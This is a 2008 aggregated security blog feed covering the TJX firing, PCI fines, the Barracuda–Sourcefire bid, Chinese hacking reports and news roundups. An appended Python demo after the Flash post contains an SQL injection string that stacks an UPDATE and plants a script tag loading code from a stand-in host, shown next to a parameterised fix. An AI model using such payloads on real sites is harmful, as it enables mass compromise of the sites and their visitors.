Sunday, June 1, 2008

Spliced feed for Security Bloggers Network

Separation of duties is a tool, not a goal [Kees Leune]

Posted: 31 May 2008 09:27 PM CDT

Separation of duty is one of the most powerful tools an information security professional has. But that is exactly what it is: a tool; not a goal.

My family and I live in a very safe suburban neighborhood. The incorporated village has its own police force, and most of the village's budget is spent on it. Much to my surprise, we have become more and more aware of suspicious activity in a house in our area; cars pull up at the strangest hours and leave again within 5 minutes. Usually someone walks over from the car to the house, a handshake is exchanged and the visiting party leaves. Sounds like there is some trade in "stuff" going on.

As with most people, we are not too happy that this is happening on our doorstep. We have repeatedly called the local police department and even had house visits by detectives who were trying to figure out, from our witness statements, what might be going on. The last house visit ended with the detectives reassuring us to call whenever.

Much to our chagrin, whenever we have been calling we cannot get past a dispatcher who knows nothing about the case and refuses to forward our calls to the detectives. Today was a new record; as we witnessed another exchange, we called the police department.

The response? "Sorry, the detectives do not work on Saturday. Please call back Monday after 9am to file your report."

Excuse me?!

It gets "funnier". This time, the car that pulled up was a street-racer model: lots of engine revs and loud music. Our next-door neighbors also called dispatch to complain about the noise. Guess what? Within 5 minutes, three marked police cars showed up on the scene to check out what was going on!

I understand that detectives do investigations; just like in information technology, it is the information security officer who does the investigation and the field support techs who take the general calls. But please: separation of duty is a tool, not a goal. When the dispatcher chooses to send three squad cars to a noise complaint, but none to an alleged drug deal, something is wrong in this world.

Satellite Hacker Tells All [Liquidmatrix Security Digest]

Posted: 31 May 2008 12:45 PM CDT

From Wired…

SAN DIEGO — Christopher Tarnovsky feels vindicated. The software engineer and former satellite-TV pirate has been on the hot seat for five years, accused of helping his former employer, a Rupert Murdoch company, sabotage a rival to gain the top spot in the global pay-TV wars.

But two weeks ago a jury in the civil lawsuit against that employer, NDS Group, largely cleared the company — and by extension Tarnovsky — of piracy, finding NDS guilty of only a single incident of stealing satellite signals, for which Dish was awarded $1,500 in damages.

“I knew this was going to come,” Tarnovsky says. “They didn’t have any proof or evidence.”

The trial was years in the making, yet raised more questions than it answered. It came down to testimony between admitted pirates on both sides who accused each other of lying. Now that it’s over Tarnovsky, who was fired by NDS last year, is eager to tell his side of the story.

Article Link

Tip of the hat to Adam for this one


Chinese hackers…underachievers! Only responsible for 88% of attacks on Australian government websites. [The Dark Visitor]

Posted: 31 May 2008 08:47 AM CDT

Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:

CHINESE computer hackers are responsible for 88 per cent of attacks on Australian government web sites, according to web security company TippingPoint.

Read why Chinese hackers can’t break that remaining 12%


Look to the acquiring banks, not the PCI Security Council [Network Security Blog]

Posted: 31 May 2008 02:12 AM CDT

Alan is continuing the conversation about the firing at TJX and reporting Payment Card Industries ‘violations’ to someone. I want to pause the conversation for a moment to clear up a few misconceptions.

The PCI Security Council has no power to fine and is only responsible for maintaining the PCI Data Security Standards and administering the assessment process. They set the standards and keep track of who’s compliant (or not). That’s about it. They have a lot of power to influence the security industry. They have complete control over the assessment process. But what the PCI Security Standards Council does not have is a direct means to fine a company for not being compliant. There is almost no direct relationship between the PCI Council and the businesses taking credit cards.

The credit card companies never fine a merchant directly, since their relationship is with the acquiring bank, not the merchant. In simplest terms, the acquiring bank takes the credit card information from the merchant and gives the merchant his money, minus a small fee. The acquiring bank, the PCI Council and the credit card companies all have direct relationships. Only the acquiring bank has a relationship with the merchant. The credit card companies can fine an acquiring bank, but don’t fine a merchant directly, though that cost is usually passed through to the merchant in some form.

If a merchant suffers a compromise or is non-compliant, the acquiring bank has several punitive options, including raising the per-transaction fee or levying a fine. Most merchants would rather receive a fine than raised fees; for medium and large businesses the fine would be much less painful than a 0.25% raise in their per-transaction fees. 0.25% of several hundred million dollars is still a lot of money. The acquiring bank can also choose to absorb the loss.

The acquiring bank has the power to make a company hurt if they’re not compliant or suffer a compromise, the ‘teeth’ Alan’s looking for. There isn’t much direct evidence of how much the acquiring banks are fining companies and what we saw happen with the first TJX incident wasn’t inspiring. Visa fined the acquiring bank $880,000 which will likely be passed along in one form or another. But we, the public, don’t know the specifics of what TJX was fined because there is no reporting requirement. Even working in the industry, all I know of the fines is from the press.

The bottom line is, the PCI process has teeth. They’re being used quietly by the acquiring bank as part of the business processes. It’s a monetary issue from start to finish; there are no legal requirements. Would I like to know what the fines being levied against companies are? Yes, and I’d like to have enough information to understand the effectiveness of the PCI Standards. But there’s no fiscal incentive for any of the parties involved to disclose fine information to the public, so don’t expect to see it any time soon. Just because we don’t see the teeth doesn’t mean they’re not there, though.

And as far as I can tell, there’s no way for the public to get in touch directly with the acquiring banks.


Leave Sourcefire Alone! [NP-Incomplete]

Posted: 31 May 2008 01:54 AM CDT


Apparently Barracuda, the SpamAssassin + ClamAV in a box company and perennial purchasers of godforsaken airport advertising space, is trying to eat SourceFire, the people who own ClamAV. I am debating making a Leave-Britney-Alone style video as a response. Trust me, no one wants to see that.*


* In interest of full disclosure, I do hold FIRE in my portfolio.

Bad marketing department! Bad! No bagel day! [NP-Incomplete]

Posted: 31 May 2008 01:38 AM CDT

Hoff had a post about a VirtSec startup known as Hyperbole. Their product/feature names include such gems as HyperTension, HyperSensitivity, and HyperVentilated.
...
All I can think is of some CSO three years from now muttering "I bought HyperTension and all I got was hypertension."

Links for 2008-05-30 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

Posted: 31 May 2008 12:00 AM CDT

physical access pwns you again...China +1 [Carnal0wnage Blog]

Posted: 30 May 2008 07:33 PM CDT

unconfirmed but completely believable:

"Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez's visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, "We take security seriously, and as we learn of concerns about security, we look into them."

This kind of stuff has been going on for years to businessmen, and who's to blame them if some jackass leaves a laptop unattended.

http://edition.cnn.com/2008/US/05/29/china.hackers/
http://www.thedarkvisitor.com/2008/05/lose-a-laptopget-hacked-sigh/
http://www.nationaljournal.com/njmagazine/cs_20080531_6948.php

Barracuda buying Sourcefire? When Hell(FIRE) freezes over! [Security Incite Rants]

Posted: 30 May 2008 11:08 AM CDT

Yesterday the folks from Barracuda announced an unsolicited takeover attempt of Sourcefire. They are proposing a 13% premium and think they can "fix" some of the execution problems that have plagued FIRE since they went public.

I'm sure the fish aren't laughing, but everyone else in the industry is. This deal isn't going to happen, not in its current form anyway. Here are a couple of points that create serious headwind for the deal:

  1. Crappy premium - Barracuda is bottom fishing here. Yes, FIRE has had issues and there is a ton of uncertainty about their strategy and the CEO transition. But only a 13% premium? For that type of premium, large shareholders are better off just dumping their shares, rather than risk deal closure issues. Of course, I'm not an investor, but 13% seems a bit weak.
  2. Deal financing - Barracuda is offering a cash deal and says it "doesn't expect any financing contingencies." Really? I guess they could raise some money, but for a private company to raise what would need to be over $200 million isn't something you see every day, and in this kind of debt environment it wouldn't seem to be that easy.
  3. Distribution mismatch - Sourcefire makes their money from selling network security infrastructure to large enterprise and government institutions. Barracuda sells anti-spam boxes to everyone else. There really isn't a lot of leverage between the two models and if Barracuda wanted to get into the UTM business, there are a lot cheaper ways to go.
  4. Trend = Red Herring - Another big reason specified by Barracuda is that they can more effectively fight off litigation from Trend Micro over the AV gateway patent. Has Barracuda won their case yet? Oh yeah, not so much. So this is a Red Herring and just meant to sow more seeds of doubt about FIRE's existing management team.
  5. What about the main line of business? - Barracuda also says they can "fix" Sourcefire's issues. Really? How do they plan to do that, especially for only a 13% premium? This is not a credible statement. It would help to understand more about Barracuda's business for them to be able to justify that kind of statement. It's a cash deal - so they don't have to - but they should.

    I'm no fan of Sourcefire's strategy (or lack thereof), but unless I see something more compelling than buying a bunch of cheap boxes and putting Snort on them - I don't believe Drako and Co. would be any more successful at "fixing" Sourcefire than anyone else.

So Sourcefire was correct in rejecting the deal and not even sitting down. If Barracuda was serious, they would have proposed a much higher premium and had a more effectively communicated strategy for the combined entity. They could have taken a page from Microsoft (62% premium for Yahoo) and IBM (huge premium for Lotus back in the day) and proposed a number that would be hard to walk away from. They didn't.

But let's be clear - that's not what this deal was about.

This is another example of why Barracuda may be the most effectively marketed security company out there. For the cost of a press release and some legal fees, they are going to be the talk of the town, even if Howie Mandel is just saying "No Deal!" You have to figure that Barracuda is angling for a public offering in the near term (once the markets right themselves) and this is a great way to get some visibility with the investors that are likely to invest in their IPO.

A 13% premium is a joke. But as a PR and investor relations strategy, it's brilliant.


Event Planner: Gartner IT Security Summit [Liquidmatrix Security Digest]

Posted: 30 May 2008 09:53 AM CDT

In case there are any readers who might recognize me, you’ll be able to find me at the Gartner IT Security Summit next week (June 2 -3).

I’m hoping to learn something quadranty.

The Next Ten Years in Information Security
Despite rapidly advancing threats and new technology solutions, it’s relatively easy planning for the next year or two. But peering out 5-10 years is far more challenging. The Gartner IT Security Summit will provide insight and a vision of how things will evolve over the long term and provide road maps on how enterprises and solutions providers will get there.

Check my Twitter for updates on where I am and what’s good or bad.


Security Briefing: May 30th [Liquidmatrix Security Digest]

Posted: 30 May 2008 09:29 AM CDT

What a week - it’s like I’m swimming uphill both ways and it’s snowing. An extra large helping of news to make up for being late this morning. And hey - thanks to all of our new subscribers that joined us yesterday. Welcome!

And now, the news…

  1. The Attack that made Kevin Rose Cry - Revision3
  2. BBC NEWS | Science/Nature | Monkey’s brain controls robot arm Always mount a scratch monkey - seriously.
  3. Will your mobile squeal to the police? | The Register Will your mobile find a horse head in its bed?
  4. Download al Qaeda manuals from the DoJ, go to prison? | The Register Another pair of articles analyzing the somewhat chilling effect of doing research and finding yourself in jail… do we accept this as a society or not?
  5. The New Order: When reading is a crime | The Register
  6. Facebook mob trashes £4.4m Spanish villa | The Register Anyone else surprised that the girl didn’t claim it was hackers — and faintly reminiscent of the Craigslist “The contents of this house must go” issue.
  7. Bletchley Park and the decay of the museum buildings Plcurecuernxf - fcraq n craal ba gur ravtzn naq fnir gur jbeyq sebz Uvgyre ntnva - be gur npnqrzvp trgf vg.
  8. 22 French Hackers Arrested 22 SkriptKiddies singing the Jean Valjean lines from Les Miserables… the horror.
  9. USA 2008 : Briefings Schedule All your briefs belong to Jeff Moss
  10. Rands In Repose: We Travel in Tribes I’m sneaking this one in to see if you are paying attention - which Diamond Age phyle do you belong to?
  11. State of the Internet It’s all about the metrics baby.
  12. Red Curtain: An Unsung, Free Security Application Anyone willing to sing in the comments?
  13. Computer trained to read minds Neo sez - BLUE PILL, take the frakkin blue one!
  14. National Journal Magazine - Chinas Cyber-Militia Good catch Matt Franz - is this responsible journalism or just journalistic asshattery.
  15. Did Hackers Cause the 2003 Northeast Blackout? Umm, No | Threat Level from Wired.com And 27/b6 weighs in on the issue… with maybe a little more journalistic integrity.


I didn’t sign nothing (NDA) [Network Security Blog]

Posted: 30 May 2008 08:48 AM CDT

As Public Relations folks continue to embrace bloggers and treat us more like press, I get more and more press releases and opportunities to talk to the people at security companies. I enjoy getting this information and appreciate talking to these companies as an analyst/press. But I have to laugh sometimes when they pull stupid stunts, like putting the phrase ‘Under NDA’ in the middle of a presentation. If I didn’t sign any paperwork, the only thing obligating me to that Non-Disclosure Agreement is common courtesy, something PR people need to be very careful of expecting as they dip their toes in the blogosphere.

Something that PR people, as well as bloggers, are still figuring out is the exact nature of the relationship between the two groups. PR professionals are used to building relationships with reporters and knowing exactly who they’re talking to. With bloggers they don’t have that relationship, they don’t even necessarily know the name of the person they’re dealing with. On the flip side, most bloggers have no idea how to react to invitations and press releases from PR agencies. The reactions can range from completely ignoring PR to maliciously using the information provided. I suspect most of us lean towards the ‘ignore them and they’ll go away’ camp.

I used to ignore most press releases, but I started changing that recently. Blogging is about communication and learning, both of which are the exact thing PR people are trying to provide. I’ve started responding to some press releases, letting the PR folks know if I find their press releases relevant or not. I’m trying to build some of the same relationships ‘real’ reporters have and making PR aware of my interests is part of that.

But the relationship has to go both ways; PR folks need to communicate little things like the expectation of not releasing product information prior to the product’s release date. In this case, it’s not a big deal: the product will be out next Monday. But when I saw the NDA statement cleverly slipped into the presentation, part of me wanted to post about it right away just out of spite. Luckily the larger, more responsible part of me decided it’d be a poor treatment of the company.

Bloggers and PR folks have a lot of learning to do about one another. We have to understand that PR professionals have access to a lot of valuable information we might not be able to get elsewhere. PR professionals need to realize that bloggers are not reporters, we don’t have the background a reporter does and in many cases a quick flash of popularity and traffic is more important to us than a ‘relationship’ with a PR firm. If you want something to be under Non-Disclosure Agreement, ask up front if a blogger is willing to respect a verbal NDA. But don’t slip it into a slide in your presentation and expect it to be honored.


Who you gonna run to? [Network Security Blog]

Posted: 30 May 2008 12:59 AM CDT

Alan Shimel faults me for saying sometimes you just have to walk away, in reference to TJX firing Cryptic_Mauler (the upper/lower case stuff is too much for me to type again and again). Alan talks about illegal behavior, turning your employer in to the authorities, standing up for your morals to do what’s right. Of course, he ignores the fact that nothing TJX is being accused of is illegal; stupid, yes, but not illegal. And the fact is there’s no one to turn TJX in to, not in the government and certainly not at the PCI Security Council or the major credit card companies.

Cryptic_Mauler was in an untenable situation: his employer was practicing the worst sort of security, they didn’t want to change, and there was no one he could report them to. Alan wishes there were someone CM could have reported TJX’s woefully inadequate security practices to, but if such an entity exists, I’ve never heard of one. The best thing he could have done was report the problem to TJX’s acquiring bank, but unless you’re really into credit card processing, the chances are you’ve never even heard of an acquiring bank, let alone have any idea of who to call.

I like Alan, but asking me why I didn’t list reporting TJX to the authorities as an option is like asking me when was the last time I spoke to the Easter Bunny! Neither one exists! (my kids don’t read this, so I can say that). It’s fine to talk about taking the high moral ground when you’re living in a fantasy world, but the reality I live in doesn’t have anyone Cryptic_Mauler could have gone to in order to report TJX. I really wish it did; I could have used them myself in the past.

And why doesn’t the PCI Security Council have some way of reporting offending companies? I’ll hazard a guess and say they’ve probably talked about establishing just such a capability and decided against it in the strongest possible way. After all, if they had a way for someone to report violations to, that’d make the Council responsible for acting on those reports. And that’s something they really, really don’t want. But that’s only a guess.


Lose a laptop…get hacked? Sigh… [The Dark Visitor]

Posted: 29 May 2008 10:33 PM CDT

Not sure if this even qualifies as a post but, whatevah:

Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez’s visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, “We take security seriously, and as we learn of concerns about security, we look into them.”

This does continue…


Then it all went black…Chinese hackers shutting out the lights? [The Dark Visitor]

Posted: 29 May 2008 10:24 PM CDT

I have no words…

Hackers working on behalf of China’s People's Liberation Army have penetrated networks controlling electric power grids in the United States, computer security experts believe. And that may have precipitated a massive blackout on the east coast in 2003, as well as a blackout in Florida this year.

That’s just one blockbuster assertion in a long story full of them, from National Journal scoopster Shane Harris.

More here…


Keynote Speakers for The Last Hope Announced [Liquidmatrix Security Digest]

Posted: 29 May 2008 08:46 PM CDT

Just a heads up — Liquidmatrix Security Digest will be at The Last Hope. There may even be some shwag available.

For Immediate Release

The very first of the speaker slots for The Last HOPE have been announced with many more to come next week. We have had more submissions than ever and will need to add an additional track in order to accommodate the best of them. What follows are some of the highlights to date.

- Steven Levy, author of Hackers: Heroes of the American Revolution and chief technology writer and a senior editor for Newsweek.

- Adam Savage, co-host of the popular TV show Mythbusters and “a maker of things.”

- Kevin Mitnick, “the world’s most dangerous hacker” in the eyes of the government and mass media, imprisoned for over five years, and now a successful computer security consultant.

- Jello Biafra, a tradition at the HOPE conferences, former lead singer of The Dead Kennedys and one of America’s most interesting social activists.

- Steven Rambam, private eye extraordinaire, who can find out anything about anybody and has always been willing to share his knowledge of privacy with the hacker community. (The FBI prevented his 2006 talk from being given by swooping in and arresting him moments earlier. The case against him was later found to have no merit.)

These five speakers are only the tip of the iceberg. By the time the dust settles, we expect to have over 100 presentations in four tracks. While time is now quite short, if you feel you have an amazing talk idea or panel suggestion, you can still email us at speakers@hope.net. We will try and schedule as many good talks as we can cram into the weekend.

The Last HOPE will take place from July 18-20, 2008 at the Hotel Pennsylvania in New York City.

To preregister, visit http://store.2600.com/lasthope.html
To submit a speaker proposal, email speakers@hope.net
To become a vendor, email vendors@hope.net
To volunteer to help us run the conference, email volunteers@hope.net
To visit the official Last HOPE website, go to http://www.hope.net

Contact: HOPE Staff +1 631 751 2600
hope@hope.net

… and since I’m temporarily in charge — shwag is only available to those who recognize me.


Security Brieflet (the late edition): May 29th [Liquidmatrix Security Digest]

Posted: 29 May 2008 06:57 PM CDT

A couple of interesting stories over the course of the day…

Comcast Defaced (for a short while)

I can’t say that I’m all that saddened… it is Comcast after all.

Banks don’t disclose all breaches

I’d love to argue this one, but I’ve known too many bankers.

Back with more Liquidmatrix Love in the morning folks, the night is young and I’ve got work-related documentation to produce.


Disclosing in a public forum is not whistle blowing [Network Security Blog]

Posted: 29 May 2008 04:02 PM CDT

Last week TJX fired one of their employees for disclosing on ha.ckers.org that TJX is using blank passwords and other very insecure procedures. Posting in what he thought was an anonymous manner, CrYpTiC_MauleR was tracked down by management at TJX through his ISP, asked what he felt is wrong with the TJX network and fired. And as bad as I feel for him personally, I think TJX did the right thing.

Don’t get me wrong, I have very little sympathy for a company like TJX. They had one of the biggest credit card breaches in history, they’ve been put through the wringer and they still have the temerity to allow such bad practices as blank passwords and running servers as admin. I’m hoping TJX’s acquiring bank, PCI assessor and Visa/Mastercard get wind of these issues and call them on the carpet for it. But I don’t excuse the actions of Cryptic_Mauler.

I’ve read most of the thread on sla.ckers.org, and this appears to be an issue of venting frustration, not whistle blowing. If Cryptic_Mauler was talking to federal investigators or maybe even a reporter, I might call it whistle blowing, but by disclosing it in a security forum, it was simply a way of pointing the finger at the stupidity of his employer. It’s not a case of full disclosure either, since that usually refers to vulnerabilities in a product or OS, not poorly designed security implementation by your employer. He had no expectation that this disclosure would somehow improve the situation at TJX; he just wanted someone else to know about the issue. And maybe hope that someone could embarrass TJX into changing.

We’ve all been in situations where we have employers doing stupid things. We do our best to communicate with management about the problems and hope they react appropriately. The problem is, our perception of ‘appropriately’ and management’s is often very different. What we see as a horrible security hole, they may see as another minor problem that would take major money to fix. Or just as something that they don’t want to think about right now.

There’s no reporting mechanism built into the Payment Card Industry standards. To the best of my knowledge, there’s no clear cut method to report a company that has bad practices to the credit card companies or the government at all. There’s not even a press person you can talk to about the issues with to bring it to public awareness. It’s frustrating because, despite their known issues, TJX is probably far from the worst offender and there needs to be a way to make these people sit up and take notice. But that’s no excuse for posting the issues with the TJX network in a public forum.

Cryptic_Mauler isn’t a security professional. He wasn’t even a part of the IT team. But he was an employee of the company and as such was held to certain expectations. Keeping internal company issues internal is one of those expectations. I don’t like how TJX is apparently handling their problems, I don’t like that they aren’t responding more positively to internal criticism, but I don’t see that they could have taken any other action in this circumstance.

I’ve had to resign from a job before because the company wasn’t being responsible in my opinion. I’ve seen companies in the past that shouldn’t be allowed to have computers let alone an ecommerce site. I’ve been at companies that I wondered how they stayed in business, not even considering their security concerns. But I always tried to react ethically and within the bounds of my moral obligations. I’ve learned that I can do what I can do and sometimes I have to walk away and let someone else deal with the problem. Public disclosure doesn’t fit in my world view of ethics and morality.

It’s frustrating dealing with a company that doesn’t want to change. It’s hard not having leverage to make the changes that you see need to be made. How you react to that frustration is up to you. Do you scream in public like Cryptic_Mauler, keep going until you find someone who can make the change or do you move on to another opportunity? I hope Cryptic_Mauler can find a new position somewhere else; I hope the limited notoriety this incident gives him will help him further his career. But I think he made a mistake in publicly disclosing TJX’s problems, one I hope doesn’t continue to haunt him.


As if you needed more reasons to use NoScript: Flash [Network Security Blog]

Posted: 29 May 2008 09:50 AM CDT

I’ve made no secret of the fact that I’m a big fan of Firefox and the NoScript plugin. I don’t want anything running in my browser that I don’t explicitly approve of. And now with the big rise in sites compromised with the latest Flash exploits, there are more reasons than ever to use NoScript. I don’t use Flashblock myself, but it also comes highly recommended for dealing with this issue.

The interesting thing to me is that this attack is a combination of SQL injection against the servers and a payload containing the Flash exploit. If the compromised sites had made the effort to use good coding practices and checked for SQL injections, this wouldn’t be a big deal. Another alternative would have been a web application firewall. This is 2008, not 1998, SQL injection is low hanging fruit on the security tree and most of the sites compromised should have something in place to stop SQL injections. But they don’t, so we have a nice outbreak of Flash exploits.

Security Focus stated that there were approximately 20,000 compromised web pages as of Tuesday. That sounds like a lot until you figure out the math and realize that this may mean 2000 or less machines compromised, depending on the average number of pages per system. I guess 2000 doesn’t get the clicks nearly as well as 20,000 does.
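The post above describes the two halves of the campaign: a SQL injection against the site's database that plants a loader for the Flash exploit into content the site later renders. The following is an added example, not code from the original post or from any of the sites involved. It uses Python's standard sqlite3 module with a constructed in-memory product table; the attack string and the `exploit.example` host are made up for the demo, and `executescript()` is used only as a stand-in for database drivers that accept several statements per request (the stacked-query behaviour this kind of injection depends on). The same lookup is shown built by string concatenation and then with a bound parameter, which is the "good coding practice" the post is asking for.

```python
import sqlite3

# Constructed demo payload (not from the original post). The attacker's goal
# in a mass-injection campaign is to append a loader for the exploit page to
# every text field the site will later render. The host name is a placeholder.
INJECTED_TAG = '<script src="http://exploit.example/f.js"></script>'
ATTACK_INPUT = (
    "1; UPDATE products SET description = description || '"
    + INJECTED_TAG + "'"
)


def make_db():
    """In-memory product table standing in for a site's CMS database
    (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A shiny gadget');
    """)
    return conn


def lookup_vulnerable(conn, product_id):
    """Query built by string concatenation: the request parameter becomes
    part of the SQL text, so a trailing UPDATE runs with the SELECT.
    executescript() stands in for drivers that accept several statements per
    call; with plain execute() sqlite3 would refuse the stacked statement
    (assumption for the demo, not a property of the sites in the post)."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    conn.executescript(sql)


def lookup_safe(conn, product_id):
    """Parameterised query: the driver binds product_id as a value, so the
    trailing UPDATE is never parsed as SQL. A non-numeric string simply
    matches no row and the function returns None."""
    return conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchone()


def descriptions(conn):
    """Every description as the site would emit it into its HTML pages."""
    rows = conn.execute("SELECT description FROM products ORDER BY id")
    return [row[0] for row in rows]


def is_poisoned(conn):
    """True once any rendered page would load the attacker's script."""
    return any("<script" in d for d in descriptions(conn))


if __name__ == "__main__":
    conn = make_db()
    print("safe lookup with attack input:", lookup_safe(conn, ATTACK_INPUT))
    print("poisoned after safe lookup:", is_poisoned(conn))
    lookup_vulnerable(conn, ATTACK_INPUT)
    print("poisoned after vulnerable lookup:", is_poisoned(conn))
```

The parameterised version stops the write, which is what keeps the exploit loader out of the pages; it does not replace output encoding at render time, and a web application firewall (the alternative the post mentions) only filters the request on the way in. Both belong in front of a site that stores and re-emits user-influenced text.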


Security Briefing: May 29th [Liquidmatrix Security Digest]

Posted: 29 May 2008 09:19 AM CDT

Wheeeeee… I’d like to take this moment to again bitch and moan about how much work this is — I don’t know how Dave finds the time and I’m not a morning person and I feel really bad and I’ve been busy and I don’t have enough coffee and… yeah. I got nothin. Have a Rockin’ Thursday! Thanks to all of our new subscribers that joined us yesterday. Welcome!

And now, the news…

  1. MacOS X 10.5.3 - Big Updates, Update Now! or else the bad guys will pwn your iCal.
  2. Defacement or Failure in Containment? Play some Russian Roulette with me! don’t believe what you see… sometimes.
  3. Securiosis tells us when Whole Disk Encryption isn’t enough
  4. Canadian government ACTAs to shoot itself in the foot… again. How do you say “Chilling Effect” when you’re up to your ass in melting ice-caps and pissed off polar bears?
  5. Let a million Hackerchildren bloom - OLPC style baby
  6. Ask /. all about security theatre HA… I didn’t get Frist Psot!!!!11!!!!
  7. Totally wicked xkcd all about security holes xkcd is the userfriendly for the post-dot-bomb world
